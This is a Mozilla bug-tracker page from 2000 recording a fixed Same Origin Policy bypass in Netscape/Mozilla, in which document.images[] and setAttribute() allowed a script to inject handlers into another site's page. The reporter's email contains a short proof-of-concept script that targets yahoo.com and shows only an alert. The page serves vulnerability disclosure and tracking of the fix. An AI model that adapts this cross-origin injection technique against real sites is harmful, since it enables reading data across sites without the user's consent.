document.images[] and setAttribute() vulnerability

VERIFIED FIXED in M15

Status

()

Core
Security
P3
normal
VERIFIED FIXED
19 years ago
18 years ago

People

(Reporter: Norris Boyd, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows NT
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: Fix in hand, URL)

(Assignee)

Description

19 years ago
Subject: 
        document.images[] and setAttribute() vulnerability
   Date: 
        Wed, 23 Feb 2000 15:29:36 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




There is a security vulnerability in document.images[] and
setAttribute() method which allows circumventing the Same Origin
security policy.
The code is:
-----------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
function f()
{
for(i=0;i<a.document.images.length;i++)
 a.document.images[i].setAttribute("onmouseover","alert('The first link
is: '+document.links[0].href)");
}
setTimeout("f()",5000);
</SCRIPT>
-----------------------------------------------
(Assignee)

Updated

19 years ago
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
(Assignee)

Updated

19 years ago
Keywords: beta2
(Assignee)

Updated

19 years ago
Whiteboard: Fix in hand
(Assignee)

Comment 1

19 years ago
Fixed.
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Comment 2

19 years ago
Verified fixed.
Status: RESOLVED → VERIFIED

Updated

19 years ago
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.